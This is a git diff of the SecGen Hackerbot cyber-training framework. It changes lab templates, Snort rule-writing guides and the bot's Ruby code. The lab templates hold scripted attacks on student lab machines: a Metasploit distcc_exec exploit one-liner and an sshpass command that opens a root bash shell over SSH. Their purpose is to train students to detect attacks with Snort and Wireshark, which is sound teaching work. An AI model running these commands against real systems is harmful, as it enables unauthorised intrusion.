diff --git a/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
index ca5b8ef8a..023b6795b 100644
--- a/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
@@ -62,8 +62,11 @@
sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash
+
- Today you are about to be under attack.
+
+
+ You are about to be attacked!
When you are ready, simply say 'ready'.
@@ -114,14 +117,14 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<%
- $permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb']
+ $permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<%
- $integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb']
+ $integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
diff --git a/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
index 38dd49229..91a64569d 100644
--- a/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
@@ -230,7 +230,7 @@ I'm about to attack your system, use Snort to detect the method of attack.
nmap -sX <%= $web_server_ip %> > /dev/null; echo $?
- false
+ false
#5 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...
@@ -255,11 +255,10 @@ I'm about to attack your system, use Snort to detect the method of attack.
- <%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %>
- msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
+ msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'
#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire.
diff --git a/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb b/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
index f39624ce4..41ec52e98 100644
--- a/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
@@ -57,9 +57,11 @@ echo 'alert tcp any any -> any 80 (msg: "Web traffic detected - ASDFGH"; sid:10
service snort restart
```
+
+==**Don't forget to reload Snort every time you add or modify a rule!**==
+
**From your desktop VM**, browse to a website, and confirm the rule worked to generate an alert containing "ASDFGH". Note that Hackerbot will require you to include particular text within the alerts of the rules you write.
-==Don't forget to reload Snort every time you add or modify a rule!==
# TODO RANDOM
# HACKERBOT ATTACKS
diff --git a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
index 563598536..e03e682c6 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
@@ -63,6 +63,8 @@
false
+
+
Your web server is going to be attacked. I have inside information that will help you to monitor your network for the attacks. If you work with me I'll provide you with some flags.
@@ -112,193 +114,23 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> /bin/bash
+ msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
+ whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'
-
- It's your job to set up remote backups for <%= $second_user %> (a user on your system). Use rsync to create a full (epoch) remote backup of /home/<%= $second_user %> from your desktop system to the backup_server: <%= $web_server_ip %>:/home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>.
+ #6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire.
- ls /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/<%= $files.sample %> > /dev/null; echo $?
0
- :) Well done! <%= $flags.pop %>
- true
+ Hope you caught that.
+
- No such file or directory
- :( You didn't copy to remote ssh /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/ Remember that the trailing / changes whether you are copying directories or their contents...
+ 1
+ :( Failed to contact the web server (<%= $web_server_ip %>)
- :( Doesn't look like you have backed up all of <%= $second_user %>'s files to /home/<%= $main_user %>/remote-rsync-backup/<%= $second_user %>. Try SSHing to the server and look at what you have backed up there.
+ :( Something was not right...
<%= ERB.new(File.read self.templates_path + 'write_snort_rules.md.erb').result(self.get_binding) %>
diff --git a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
index 88783f71c..b40035d51 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
@@ -53,9 +53,9 @@ Lets create a basic rule that detects any web traffic on port 80.
```bash
echo "alert tcp any any -> any 80 (msg: "Web traffic detected - RANDOM"; sid:1000002; rev:1;)" >> /etc/snort/rules/my.rules
-systemctl restart snort
+sudo service snort restart
```
-Browse to a website, and confirm the rule worked to generate an alert containing RANDOM.
+Browse to a website, and confirm the rule worked to generate an alert containing the text 'RANDOM'.
# TODO RANDOM
diff --git a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
index 5de097b9f..894562a70 100644
--- a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
+++ b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
@@ -34,6 +34,9 @@ def check_output_conditions(bot_name, bots, current, lines, m)
sleep(1)
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
else
m.reply bots[bot_name]['messages']['last_attack'].sample
@@ -130,6 +133,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for the first attack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
end
@@ -148,6 +154,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -169,6 +178,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -218,6 +230,9 @@ def read_bots (irc_server_ip_address)
sleep(1)
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -369,9 +384,9 @@ def read_bots (irc_server_ip_address)
rescue # continue consuming until input blocks
end
begin
- Timeout.timeout(5) do # timeout 10 sec
+ Timeout.timeout(15) do # timeout 10 sec
stdin.close # no more input, end the program
- post_lines = stdout_err.read.chomp()
+ post_lines << stdout_err.read.chomp()
end
rescue Timeout::Error
Process.kill("KILL", wait_thr.pid)